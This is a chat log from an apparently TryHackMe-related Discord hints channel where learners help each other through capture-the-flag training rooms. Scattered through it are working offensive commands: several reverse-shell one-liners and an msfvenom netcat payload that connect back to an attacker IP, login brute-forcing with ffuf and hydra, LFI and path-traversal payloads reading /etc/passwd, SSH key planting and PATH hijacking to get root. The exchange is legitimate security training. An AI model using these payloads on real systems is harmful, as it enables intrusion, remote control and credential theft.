#room-hints
Or if it has a valid shell path
I've used that in the past for THM questions that wanted to know how many users a machine had.
There's multiple shells, not just /bin/bash.
As long as it isn't like /dev/null
Can't view imgur pages at work
Just drop it in here
You can escape the colon with . But it's fine.
with \
Yeah, so /nologin, /sync, /games, paths like that mean those users don't have a shell, so probably aren't "user" accounts.
I only see a root user
Oh I think I remember that. What room is this?
Which task
The second question?
So, based on /etc/passwd, how many users are there other than root with a valid shell?
Try it.
I don't remember how I figured out the answer to the next question, but it's the standard user that web servers run as.
Gave +1 Rep to @versed leaf
Oh there.
No problem.
Oh, I forgot you could send commands in.
Sweet.
Hint: the question always tells you the format that it expects an answer in, and the number of asterisks equals the number of characters in the answer. When I'm confused, I use that to kinda clue me in. So for that question it would've said Answer format: ******** which would've told you it was looking for an account with 8 characters in it.
Especially helpful since it shows you slashes and periods and most other punctuation.
lol no worries. Learning has occurred
Hiii
I ran into a pinch in the file upload room of the web fundamentals room
So you see I've been able to connect the webs in the task till it got to java.uploadvulns.thm
It'll go on my normal browser but it won't go on burp or zap
Keeps rejecting connection
did you set up the proxy properly?
Hi All, Need some help in the below room. I am stuck on Task 25 I am unable to get the attackbox or my own Kali VM to run jwt-cracker. Any tips please? https://tryhackme.com/room/zthobscurewebvulns
Yep I did, Regular proxy settings
```
apt install npm
npm install --global jwt-cracker
```
jwt-cracker <token> [alphabet] [maxlength]
Do I do an example so you'll copy paste the code ?
Thanks I will try that 🙂
On the same machine
I'm running Linux as an OS
One is burpsuite's chrome the other is Firefox with no proxy
thanks it worked 🙂
Gave +1 Rep to @west harbor
You're welcome
Help guys
Pls any one
If it's going through the burp proxy it won't work but with proxy off it will (I forward the intercept) also if I use burp in browser it doesn't work
Solved it meanwhile ?
Show me the output of cat /etc/hosts pls
First of all, please use screenshots instead of photos, that's a pain to check. 🙂 Then get rid of all the duplicates in the file.
If it's the correct target machine IP then it should be, yes
So is it working with Burp now or still not ?
Anyone able to spare a hint on Osiris? I managed to gain the foothold and first flag. Using enum scripts, I think I found the next step, but am unable to retrieve/decrypt the information. I also retrieved the necessary key and file for "offline decryption", but the according tool always crashes, when performing the decryption.
To not spoil the fun/hunt for everyone else, I can share more information via DM.
:@ i spend 3 days working on "Jeff" stuck on the FTP server. Wondering if I missed a hint somewhere about the next step. Don't think I would have ever made that connection on my own unless was able to find my own files zipped up on the webserver
Are you really just supposed to guess Jeff is running a script on your uploaded files?
doing lazyadmin. I found the sweetrice site, which isn't "open" yet. the site tells me to go to some dashboard. I looked at the documentation and also the github repository. Everywhere it just says "log in and go to the dashboard". I can't find any login forms though. No other ports are open either.
5 steps install SweetRice
- Unzip the package and upload everything to website root directory[root dir].
- Open http://yourdomain/[rootdir]/ in your browser,accept the GPL license and jump to install form.
- Chmod directory inc,attachment,and root / permission to 755[if necessary]
- Enter your website ,database and administrator information and submit form.
- Login to dashboard and enjoy SweetRice.
apparently at least the first step has been done
nvm... found it.
I'm not sure if this belongs in #room-help or not, but I am being asked "What is the name of the other user account?". I believe I have put in every logical answer in every combination I can think of, and it is not accepting it. Any help on this matter would be appreciated
Need to know what room and task you're working.
Is it Conti? I think that question was in Conti.
Windows Fundamentals 1 task 6
Ah
I'm not sure what I can say in here about what I have tried
If you open local user manager (lusrmgr.msc) it can show you what users are on the computer.
Done that. I don't get any relevant info to the question
I get a message saying "This snapin may not be used...etc."
double clicking anything produces nothing as well
It lets you open it.
Right-click Start, hit Run, "lusrmgr.msc", expand Users
You sure you're on the right machine? I didn't have any issues opening it. Try restarting the box.
This is why IT and COFFEE go together. I left and came back to this. I've been trying to do this on my host. Sorry for wasting your time, but thank you for trying. I'm now booting up the VM
Gave +1 Rep to @versed leaf
No worries, glad you got it.
Can anyone give me a hint for Horizontall?
I see that there is a CVE for the version of SSH running, but it is returning that ALL user names I am passing to it are valid
!docs verify
In 'Common Linux PrivEsc', in Task 9, the last step doesn't seem to work for me: Now, run the "script" file again, you should be sent into a root bash prompt! (I don't think I changed the script file. Not sure how it will give me a root bash prompt).
Did you reset the PATH variable back to default already before doing the last step?
yes. am i supposed to run /usr/bin/script?
No, you are not supposed to restore the PATH variable before you finished all the steps. Otherwise it won't work. So it's crucial that you have /tmp in your PATH variable and your ls executable in that directory.
The script in the home directory will try to run ls. So when /tmp is not in the PATH variable it will use the default ls binary located in /usr/bin or /bin . But if you have /tmp in the PATH variable it will use your custom ls binary and therefore spawn a root shell.
My custom 'ls' is running /bin/bash - is that supposed to give a root shell
Yes, but it has to be done through the script file in the user5 home directory because that file has the SUID bit set.
Otherwise it will just spawn a shell as the user you are already logged in with and therefore you won't even notice anything.
I'll take another look and get back. Thanks
Gave +1 Rep to @left thunder
Ye, not a problem, might be a bit confusing at first, dunno how to explain it in a different way ^^
was the intent of task 7 to base64 encode the flag? https://tryhackme.com/room/linprivesc
I checked again. I don't think the instructions talk about replacing the script file. I tried changing suid for the ls in /tmp, but that didn't work. Will take another look later
Is there an alternative to https://scylla.sh/ ?
Ye, you are not supposed to replace the script file. All you have to do is execute that script file. And giving your ls executable SUID will also not change anything, as it will not be run with root privileges because the file owner is the one you are logged in with.
Hi, any body did the room https://tryhackme.com/room/res?
whether it is possible to privesc to root? (even without it i can still answer all the question)
?
i did it a while ago. base64 to get privilege escalation by reading important files
hey doodz..room:authentication bypass
i have enumerated the list of names. i put them on a .txt
feed them into the cut and paste
ffuf -w newnamelist.txt:W1,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.140.65/customers/login -fc 200
it runs through the names and nothing happens.
i've tried changing the spacing, changing flags, changing '200', even though that would be the indicator, changing wordlists (rockyou, etc) as well as reenumerating in case i missed a name
need halp!
So you have no status codes, size whatsoever in that file except the usernames?
https://tryhackme.com/room/johntheripper0
task 7
I basically want to know if i am going at this right, my hash file should be Joker:7bf6d9bb82bed1302f331fc6b816aada
and the command I run should be john --single --format=raw-sha256 hash7.txt
I was trying to use the wrong format
Can someone point me in the right direction on this server-side filter enumeration? I'm trying to use the intruder module in burp suite to enumerate what file extensions are allowed but don't seem to get any hits. Some of the write-ups I've come across reference a specific extension but that doesn't seem to work in my case.
Ugh, nevermind. There must have been something up with the webserver. Once I reloaded it it's working as expected.
Yea, that's weird. When I would try to upload a file the 'submit' parameter in the URL was returned as 'failure' rather than 'invalid' like I'm seeing now.
correct. i didnt think the size parameter mattered in this enumeration because it was being filtered by the -fc flag ?
No I was talking about the valid usernames file. So is there anything else in it besides the usernames?
oh. no just the usernames
Did you edit the output file of ffuf for that usernames list?
Or you created everything manually ?
created it manually
Also the empty file itself, right ?
yes
i touched it
should i attempt to make the original enumeration of names > into a file then run it ?
No, if a manually created file doesn't work then the file ffuf will create won't work either
Can I have the IP of the target machine so I can try it myself real quick ?
10.10.171.89
Btw, are you on your own machine or the attackbox ?
my own VM
What version of ffuf you are using ?
1.3.1
Is it just a naming thing or why is your SecLists folder called SecLists-master ?
its just the seclist i downloaded
i think it was the suggested link in one of the rooms actually
that's the only thing i've had to change from the normal cut and paste commands like that
maybe i'll try for the attackbox
Okay, could you try it like that? ffuf -w newnamelist.txt:W1 -w /usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.171.89/customers/login -fc 200
Ye, I guess on the attackbox it will work, as it was working for me as well
i wonder what the issue is
Maybe try that as well #junior-pentester-path message
thanks !
yeah i got it working
also it wouldn't take names redirected into a file, i had to manually do it. super odd but ffuf looks really useful. i should get better with it
@amber sail did you get it working?
no
Where are you finding the IP you're scanning?
on the vpn tryhackme provides
Where though?
Physically where on tryhackme are you seeing it?
well i looked in ifconfig and on https://tryhackme.com/access
That's the IP for your own box, not the target
That's an assumption on your part.
Why do you think it's saying that? I can assure you that it is not.
it says to do "
Scan this box: nmap -sV <machines ip>" and right before it it tells me to open up the vpn
i wish i could send screenshots
it doesnt give me a IP to check
!docs verify
just to check machines ip
It means the target machine
NOT your machine.
Click the Start Machine button in Task 1
ohhh
Use the IP displayed under Active Machine Information
Do this if you want to be able to send images
okay machine is starting rn
I'm having trouble finding the HTTPS:// certificate issuer in the Encryption/Cryptography module. I'm using Safari.
It's Task 8
okay its working now thank you so much
Gave +1 Rep to @stuck fractal
okay now im having trouble again it says to scan with -p-400 and it scanned 4 ports but the question keeps saying it s wrong
that's 4 ports right
open
It checked more than 4
You'll need to do a bit of maths.
lmao my bad i need to drink some water im dehydrated
oh duh i was thinking that since it found those ports open it wasnt scanning em
im a little slow today
Also, you need to use a switch that enables versioning/fingerprinting of the discovered services.
There's several available that'll do it.
will need to, not quite yet
Always best to avoid rushing ahead
TCP is what it didnt resolve right
yeah i have im just really bad at remembering where to look for each flag with for certain info
usually when its not resolved nmap tells me
but nothing on there is saying not resolved
and im really tired so i think i should take a break before i do this
i havent gone to sleep in 2 days
yeah ima go take a nap
thanks for helping me hopefully i can figure it out after my rest
Hey everyone, on the Pre Security, How Websites Work, Task 1, I'm having trouble inputting the answer. I keep getting "incorrect answer" but Idk what's going on. I've typed the answer different ways but I'm still getting incorrect answer. Can someone help me with this please lol? it's frustrating
the DNS one?
Scratch that, I see the specific "how websites work" task... did you look at the asterisks? they give a hint
What answers have you tried so far?
..nevermind just checked the other channel
Hey everyone. I am trying the goldeneye guided CTF and I am at the point where I am supposed to get a reverse shell by editing the path to the ASpell location.
So far I have tried
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <myIP> 4444 >/tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<my_Ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<myIP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
sh -c '(nc -e /bin/bash <myip> 4444)'
and
sh -c '(python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<myIP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")')'
and then tried to trigger it by going to my profile > blogs > Add a new entry >> activate spell Check
None of the above seems to work and I feel like it should... Can anyone give me a pointer?
I am kind of stuck on "Smag Grotto" and I am not sure where to go from here.
More specifically, I got a shell as www-data and need to elevate to use Jake to grab user.txt.
||I found the cron job that adds a public key file to "authorized keys".. and I can write to this file. Idea is to create my own pair of keys, replace Jake's public key with mine and wait for the cron job to run. Then I can ssh as Jake using the private key. However, I keep getting prompted for a password each time.||
Instead of replacing Jake's keys with yours, are you able to grab Jake's keys and use them instead?
I have his public key but not his private one. So yea I can’t use those.
If you get a shell as www-data, are you able to access Jake's directory? If so, should be trivial to grab his private key.
Www-data doesn’t have access to Jake’s stuff. The public key I found is inside /var/.back/keys-pub.backup and I learned I can modify it.
I think it’s the way I’m formatting the key when I replace the existing content. I will experiment with this a little more once I get home.
For task 11 of the OWASP room, does anyone know what webapp they are talking about? Are they talking about the web app(http://10.10.63.253:8888 ) from task 7 ?
From task 8
"Well, we can download it and query it on our own machine, with full access to everything in the database. Sensitive Data Exposure indeed"
Do I download it from the browser or command line?
when I do "ls -l" it doesn't show any databases
when I cd into the Downloads folders, it shows no downloaded databases
What task is that from?
Oh it's just saying that for flat file databases, if not secured, you could potentially download the whole database and query it at your own leisure.
Keep following the task and it'll walk you through it.
do I need to do anything on my terminal to find the answers or do I just need to read through the manual
The task will walk you through what you need to do. Mostly.
Okay , why can't I connect to my target machines IP in a web browser
everytime I try to connect, I get an unable to connect message
How are you connecting - through a VM or using a THM-hosted attackbox?
THM-hosted attackbox
Can you post a screenshot of your error?
I actually fixed it. I was typing "http://MACHINE_IP" when I should have just been typing "MACHINE_IP"
they don't allow me to post screenshots in here
To post screenshots, you would need to verify your THM account with the discord bot
!docs verify
Has anyone recently attempted Kiba?
I found the ||prototype poisoning|| vulnerability and I found a python script that can exploit it but I keep getting this:
Exploit through the Dashboard (Timelion and Canvas) is also not working.
Anyone completed the Windows Forensics 1 room? I'm having trouble on the hands-on challenge specifically with finding the last time the USB was connected.
For future references how would I do that?
Follow the instructions in the link
!docs verify
!docs verify
https://tryhackme.com/room/passwordattacks
||hydra -l phillips -P clinic.lst 10.10.143.247 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!"||
task 8 question 3
what i do wrong? any hints?
Answered you in #subs-room-help
Hi! I'm having a problem with the machine's IP we are supposed to attack in rooms NMAP & NETWORK SERVICES. I need the IP to answer the questions, but I don't know what it is. Where can I find that IP?
look for the tasks that have a green thing on the right, those you can start the box that is your target
@crisp forum Are you saying that the IP address on top of the page is the machine we have to attack? I thought this IP belongs to the machine that I am using.
@crisp forum @timid hollow Thanks, folks. I finally understand.😋
Gave +1 Rep to @crisp forum
The target machine IP can be found in a box like that:
Ah, nvm if you already figured it out then ^^
@left thunder Yes. But thanks anyway.
Shaker is really perplexing... I have so many threads but I don't know how to pull them... lol

Hi there, I need some help pls. What is wrong? Room Linux PrivEsc
did you figure it out, I'm guessing you are using the attackbox?
yes, attackbox
so looking at the room and your script, the room doesn't have line 2&3 in the backup.sh script
actually nevermind, I see they are using antivirus.sh vs backup.sh
but both should work, I'm trying it through attackbox
is this the room you are doing? https://tryhackme.com/room/linprivesc
there are 2 or 3 priv esc rooms, the other one didn't look like yours I thought but I think I might've chose the wrong room
Solved it meanwhile ?
If it is the one I linked above, it wasn't working for me either, but then I checked the permissions of the backup.sh script and it wasn't marked as executable, once I did that, it worked (I did this room previously but a long time ago)
I will try, thank you
That's way more than a hint 😄
it works. thank you
Linux PrivEsc (NFS Priv Escalation) walk-through room / TASK 11
I am having trouble getting a shell after mounting the folder to my attack machine and creating a file per the instructions. Not sure where to take it from here.
Can someone throw me a bone?
I think the goal is running nfs (has SUID set)
But how
I think I figured it out. There was another shared directory that had “no_root_squash” and I could access. Had to mount that instead and create my file there.
room network services, I have both the rsa private and .pub key, now how do I use them to login to ssh?
Solved it meanwhile ?
And what's the issue ?
How to drop the msfvenom script in skidy's backside
Just copy paste ?
didn't work right for some reason
What have you copied ?
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.166.80 lport=4444 R
That's what you paste into the telnet session ?
Yeah, I think I did it wrong
msfvenom is a hacking tool that will create payloads for you. So you have to run that command on your attacking machine and then copy and paste the output you received from msfvenom
yeah, had to start over due to causing a ping flood
Don't forget the -c 1 😄
kek
Where does the file drop out of term into?
tried looking in tmp
ahhh raw payload in term
Ye, it will print the payload right in the terminal
I did the payload but nothing is coming in on netcat
mkfifo /tmp/tqbz; nc 10.10.166.80 4444 0</tmp/tqbz | /bin/sh >/tmp/tqbz 2>&1; rm /tmp/tqbz ?
That's the full command you used in the telnet session ?
Right
If it's still not working with run now you might have messed up the machine and have to restart it, but let's see
I got the 'connection rec' message but none of my commands print out in netcat
What you mean, so if you enter whoami you are not getting a reply ?
At first, but you get easily used to it 🙂
so many windows to manage
nmap -vv -A 10.10.121.53 > portz.txt
rapid scan of all ports to file?
You haven't specified to scan all ports. And using -A is barely necessary and an overkill, especially for an initial scan on all ports, although they might have suggested to use that in the task itself
nah, I assumed -A was quick and durty
Check nmap -h if you're unsure what a flag is doing. But it's rather slow and aggressive.
what is it not resolving
What room you need help?
use nmap -sV -A -p- <ip>
ahhh i see
but it doesnt say its not resolving anything
like it usually does
if something doesnt get resolved it usually says "did not resolve..."
nah
If you see the hint and make some research
or you can use man nmap
then look on -n
You're welcome 😄
Not sure if simply giving out answers is a good approach, especially in the room hints channel. Just saying 🙂
Oh sorry about that 😄
But he know the way to find that answer
I'm not a mod or something, so all good, just wanted to let you know my opinion on it. :=)
I delete it 🙂
i did that and i got this
use the wordlist on dirbuster 🙂
Also, read the error message, it explains what's happening. You're telling it to scan https...., but it got an HTTP response from the server. Drop the s.
Hmmm maybe?
okay i did that but its still not giving me a upload form page directory
do i have to open dirbuster for that
yes
/usr/share/wordlist/dirbuster/
use the medium one
Or you can run dirbuster against it without any options and it'll use the default list.
okay now im getting somewhere using the medium word list
its giving me a lot more dir
got it it was the last dir that showed up after 62k
Here is the location: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
i got it thank you!
Gave +1 Rep to @iron wigeon
Congrats!
Anyone completed the Windows Forensics 1 room? I'm having trouble on the hands-on challenge specifically with finding complete path from where the python 3.8.2 installer was run? I've already checked the ShimCache, AmCache, BAM.
Pls has anyone done ✅ with psycho break
<redacted link> Heyo. I was trying out Crocc Crew CTF, but when trying to impersonate as administrator to gain its ticket, this happened...
not sure if my KRB5CCNAME is set correctly, if someone could help me out i'll be grateful. 😄
Hi, i have a problem with Network services, task 7: Exploiting Telnet (like most of us). I run the msfvenom command on my terminal (attack box), start the netcat listener, then run the payload in the telnet session (i use another terminal on my machine). The listener starts, but when i paste and run the payload in the telnet session, i read only this in my terminal:
connection from ip-10-10-27-182.eu-west-1 .... 53274 received!
Tried so many times...
Did you try to enter a command after "connection received" ?
I don't know what to enter. The room doesn't say anything about that
For example whoami. But if you're unfamiliar with linux I suggest doing the linux fundamental rooms 🙂
Huh? I couldn't read that message as you deleted it that fast 😄
Eh eh... because I tried a different thing and got the flag. I was in the reverse shell, but I wasn't aware of that. Sorry, but for a native Windows user I expected something more verbose from the reverse shell. Thanks @left thunder
Gave +1 Rep to @left thunder
In ohsint room, for the last question, I don't understand what I am trying to get the password to?
I think that password has no specific use, you just have to find it :=)
Alright, I managed to get the Administrator.ccache and fix KRB5CCNAME. and also gather the administrator lmhash, but evil-winrm won't login with it.
Guys, can I get some help with Overpass3?|| I have created a public and private key on my attacker machine with ssh-keygen and then copied the public key into authorized_keys inside /home/paradox/.ssh I keep getting "Permission denied (publickey,gssapi-keyex,gssapi-with-mic)" when trying to connect.||
you should have a password, but check the permissions on the .ssh and authorized_keys files/folders
Thanks, I'll take another look on the evening. If memory serves, I did set the file to 600 and folder to 700
it may not like your key type as well
Hi guys I was doing the DNS room, on the task 5 first question "What is the CNAME of shop.website.thm?" the console continue to return this "** server can't find .website.thm: NXDOMAIN", can someone help me?
like on the top i select the different records and the console return the answer
no its clear
oh ok but how do I know what kind of subdomain I need? isnt that what im looking for?
ok im dumb
yep now works lol, thank you didnt read the subdomain in the question🙃
I'm doing the nessus room and I got the version, but it is saying that I am wrong
bruh wat
why are there 2
Going through MR Robot now. Hint for key 2 says white colored font.. and I am kind of stuck.
Could something possibly be blending in with the background somewhere? 😉
Hi 🙋
Combination of filter bypass and request method
from what i have, it's as though the page is stripping characters and numbers. Am I missing something?
yeah I did, works with the other two common methods. Tried changing to the second method but the same thing happens. stripping of characters and numbers.
dev tools
yeah but keeps changing back to the initial method
maybe am doing it all wrong
Okay thanks.
Brainstorm room. Nmap showing only 3 open ports (-p- scan) and answer is wrong. What am I missing?
Maybe didn't give the machine enough time to fully boot ?
Well, I have not done that room so unfortunately I don't know, was just an idea on why it might only find 3 ports.
Hello, this may be a very stupid question but I can't figure out where to find the code for the first level of MLSC CTF 2022 (it's supposed to be on a discord server but I don't know which one it is and what I am supposed to be looking for). If anyone has played it, thanks!
Uhm, is this even a room on tryhackme ?
Mh, seems to be a private room, so I have no idea, maybe someone else can help you out with that.
Alright, I'll wait to see if someone knows
When I get a shell on a Windows target machine, how do I determine what shell it is? Sometimes ls does not work, sometimes I have to use powershell "(New-Object System.Net.WebClient).Downloadfile(...) instead of powershell -c "Invoke-WebRequest ... and sometimes certutil.exe -urlcache -f .... Is there a more deterministic way I can use to determine what to use?
it never told me how to send a file over a ip to see
can i just use the touch command with some flag and send it to an ip
Are you on the website yet?
just upload a file...
on the webserver of the machine
no i gotta send it from a different machine
yeah, that is your kali/attacker machine.
and just by looking at the format of the answer you should be able to guess the answer
try answering it, and if you don't get it, do the other rooms/start learning before you jump into CTF's
so i went to the website but it just shows this
I don't remember vulnversity is there a http server for it?
oh nvm i got it, it wasnt taking the last bit of the url when i clicked open link
just had to copy it myself
but i cant seem to figure out what file type because i dont have any files on my machine
You can just create a file with the touch command
Then change the extension to whatever you see fit
Hey
Am doing the html injection tutorial but when I try to view the source code I can't find the particular codes am looking for
What's the room name? There is no room called "html injection"
It's under how the website works I think
Brb
So what code are you looking for in the source code? As you only have to inject html code in the "What's your name" input field, which is then going to display a malicious link on that webpage.
i cant find the input field
Did you press the green "View site" button in task 5 ?
yea the website opened
umm
am supposed to inject it through the source code right?
So that's the site you see, right ?
No, through the input field, which is "normally" supposed to enter your name, but as this input field has no input sanitation, you can inject html code through it.
??????????
for the nmap room im having trouble on the question "How would you activate all of the scripts in the "vuln" category?" and how to scan for all ports
Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it ...
im checking that on my kali machine
Read task 11 again 🙂
wdym task 11?
You said you are doing the nmap room, right? https://tryhackme.com/room/furthernmap
Hey folks! I'm doing File Inclusion on the Jr. Pentester path, and I can't seem to find a flag for the first challenge! Anyone got any hints for me?
yes
ty
omfg there's a hint haha
I've done some traversal stuff, tried some payloads with BS
okay yeah I've been changing that to POST
let me check some things
omfg
so I changed the source and then submitted. What is the difference between that, and me using BurpSuite>Intercept>Repeater/Intruder for doing the same?
hm
maybe i just did something wrong in BS
okay
so there seems to be a .js file that somehow stops that from being grabbed properly if I do it in BS. Thank you, @burnt rivet
Gave +1 Rep to @burnt rivet
What settings do I have to change in the Burp Suite tool to get the error on the left when going to the Google.com
Where am I suppose to look for the capture data when I perform this task
You see the little button on your burpsuite called open browser
That one
i cant figure out what filetype this is
ive tried every file type i know about
@lofty girder sorry for the ping
is there any hint or anything you can give me
nvm i figured it out
Something you could've done is research what type of file extensions reverse shells can have
Then see if any of those applied to the answer
hey folks! In Jr. Pentesting course and working on the SSRF room. Can I get another hint on Task 2?
Check what happens with the "Server Requesting" at the bottom when you change the parameter value
hmm i see it but can't seem to get the flag ID to the end of the URL like the challenge says
using &x=
Can I ask someone about Osiris? Thanks.
You can DM me if you’d like xD
Haven’t fully solved it yet though
So how is your url in the url bar looking like right now ?
just got it, thank you @left thunder !
Gave +1 Rep to @left thunder
took a lot of trial and error but I guess that's what the industry is about sometimes
Hey guys. Im stuck in cc: Pen testing room - the final exam (https://tryhackme.com/room/ccpentesting).
I found the hidden dir (secret) with Gobuster but there is nothing in it, how can I find the flags in here???
I tried using different extensions after /secret/ via Gobuster but still I didn't find anything that I can get access to it.
html, php, xml, txt, js, png, jpg
I used some wordlists in seclist like "common.txt"
Thanx!
I have been stuck on the room DNS in Detail for almost 2 weeks. No one can answer my question so far. The practical does not work no matter how exactly I follow the youtube video. At 13:30 the speaker says he's having an issue, the video cuts for a sec and the speaker comes back and says if you're having issues to wait a few minutes and it will resolve itself. This is not working for me. I just want to speak to someone, a real person, who can walk me through what is going on, what is going wrong, etc. I am so frustrated I could cry and I only just started this whole thing.
Just how do you get help? What am I paying for with this website if I am just on my own????
@unborn spade
Hello everyone, any hint on nax machine?
I tried every enumeration step i could, still stuck
Any hints on what i shall focus on?
Thank you, i will go play around with that!😅
I managed to get the username and answer the third question. Now any hint for where to find the password?
hi
need a little nudge with https://tryhackme.com/room/easyctf
i guessed sqli for question 4
i havent done question 3 yet
and the hint for question four hints at password bruteforce
did you scan the system?
I did this one a long time ago, guess need to understand what steps you've done, did you scan or poke at it
lol finished that in like 2days lol
just last week
how long do you recommend staying stuck on a problem before peeking at the walkthrough?
it really depends, like did you exhaust all your ideas? and also depends what type of problem it is... I'd struggle for a few minutes, half hour what not on q&a
for a challenge system, maybe a day or even more
Like my stupid example is Hack Park where I got the foothold but could not get priv esc... so I left it for a week, came back, got priv esc in half an hour
i'm on the ignite room, and i got the user flag pretty quickly yesterday with some rce i found on exploit-db and then spent maybe 45 minutes looking around trying to find a vector for priv esc without any luck. then today i've spent about 40 minutes trying with sqlmap instead (also via exploit-db).
yeah it just really depends if you think you've exhausted your knowledge and have no other paths to explore or not
I haven't done that room, so I can't even give a hint but someone might've or you could search this room for one
i appreciate the meta-advice
perhaps i'll leave it for a bit and do another room or two, and then i'll try searching
ye
i nmapped it and got this
```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds
```
Ok so you got 3 ports and you poked at them and found nothing?
ftp allows anonymous login but when i try to connect it times out
ssh is rarely vulnerable to any exploits
i assume its an sqli injection but the hint says a wordlist will help
Basically if you are struggling what to do here, you might want to go back and look at something like the web fundamentals path
How to enumerate websites and also what techniques to try
ive done a ffuf and a dirbuster scan
i just get errors
i found robots.txt but i assume thats useless
it does tell me there might be a CUPS server running but i dont know
Maybe #holo-network ?
cool thanks man
Gave +1 Rep to @timid hollow
Or try browsing the site
it just a default apache page though
Did you do a nmap scan with -p-? So it could be a directory you haven’t found or a port (again I don’t remember this one well but based on what I did… I’d keep poking at web)
Good luck
i got this with dirbuster
```
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /icons/ - 403
ERROR: http://10.10.35.227:80/strona_7/ - ConnectTimeoutException The host did not accept the connection within timeout of 30000 ms
```
if you want more than hints, I'd try #room-help and see if someone can provide direct direction, I unfortunately need to step away
**Jr Pentester > Burp Suite — Task 7: Repeater**
I am unable to interpret what they are asking here. I change the number at the end of the url to lengthy number but only get a 404. Should I try some code injection or something?
Try Integers not only whole numbers
If you get what I mean
NP
Did you check the hint ?
I'm sure I did
I have moved on for now lol
omfg no I actually didn't. @tulip mural and @left thunder thank you
Gave +1 Rep to @tulip mural
Hey, I have a problem on owasptop10 -> insecure deserialization - code execution
Even though I understand and follow the steps suggested to the letter I can not get a reverse shell through the cookie
P.S. Seems like merely rebooting the machine fixed the problem (no additional steps needed).
hey guys i need help on this question i cant find the name of the user
hey i am doing thm dogcat ctf, any hint what am i doing wrong?
and why the /etc/passwd file isn't opening
Can i Ping you about this
You could try ||../dog/../../../../../etc/passwd||, that %00dog seems to be causing an issue
without null character it is adding .php extension
Isn't there an ||ext|| GET param?
and adding them too is also giving error
Oh, haven't you tried to read the index.php file?
It will give you a way to bypass this file extension issue
hint: look into filters
it too is also giving error
Do you need .php%00?
You mentioned, it appends .php by itself
Also, as suggested by @flat juniper
Try to look into filters, as including the .php file will render it and not show its actual content
another error
filters to bypass file extension ??
Yeah, index.php is including itself again
To read .php file without rendering it
||php://filter/convert.base64-encode/resource=||
still somewhere i am making a mistake
wait wait i got it
finally done :))
me too! finally found my 1st flag🥵
hi
I am in
Network Services room
Task 4
last one, now I have the key from id_rsa
and I changed the chmod 600
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?
this one what do they want us to do?
ssh cactus@$ip
load pubkey “/home/kali/.ssh/id_rsa”: invalid format: download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub
what if I copy paste?
ssh into machine
oh nvm
this is to solve an error that can happen
wait what is this process
load pubkey is a command
?
it will throw invalid format error
you will have to either download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub
ooh, wait this is in the kali machine not the smb right?
yes
when I used the get command I did:
get id_rsa id_rsa_l
Should I replace
ssh-keygen -y -f id_rsa > id_rsa.pub
with
ssh-keygen -y -f id_rsa_l > id_rsa.pub
yes
after this step try to ssh to the machine
if it throws Load key “/home/kali/.ssh/id_rsa”: bad permissions then you may have to revisit the chmod step
understand now??
it didn't show this error
but what password should I use
give me a sec
npnp thx
Gave +1 Rep to @lost canopy
it allows connect without password i think
ssh -i id_rsa cactus@ip
for the -i do we pass it a .pub file or could it be any file that has the key?
for the -i use the id_rsa file
yo I am in, I tried the .pub file it didn't work
I tried the id_rsa_l file -> worked
Thank you @lost canopy
Gave +1 Rep to @lost canopy
btw
what??
for the username, was I supposed to try John then cactus to identify the ssh username orrr?
cactus is the username!!!
After trying unsuccessfully with john, johncactus and jcactus, I successfully connected with cactus:
this👆
ok all the best
how many ports did you scan?
1000, didn't specify
-p-: Enables scanning across all ports, not just the top 1000
i thought this was hints 😛
All 1000 scanned ports on ip-1fhsdbjk4.eu-west-1.compute.internal (ip) are closed
MAC Address: (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds
yikes
wait so it's not 0-1000 but the most 1000 used?
yes
i accidentally gave an answer
shouldn't telnet be a common port ?
telnet should be abandoned but we can't have what we want can we lol
tru tru, alright cya!
bye
guys im trying to do the mustacchio room foothold but i cant get any access in and ive got the ||private key of barry user but no matter how i try to copy it i always get this error: ssh barry@10.10.24.2 -i id_rsa
Load key "id_rsa": invalid format
barry@10.10.24.2: Permission denied (publickey) ||
I got something here 🙂
https://wiki.wireshark.org/SMB2/FileAttributes
i dont get it
:/
See the first character of the values listed there
SMB File Attributes
- A - Archive
- N - Normal
- D - Directory
Just to complete this little quest 😄
https://serverfault.com/questions/993228/how-do-i-set-the-archive-bit-of-a-file-shared-with-samba#993329
I was kind of losing hope not to do the CTF but today morning when I opened discord it just boosted me with adrenaline and now I conquest the CTF :))
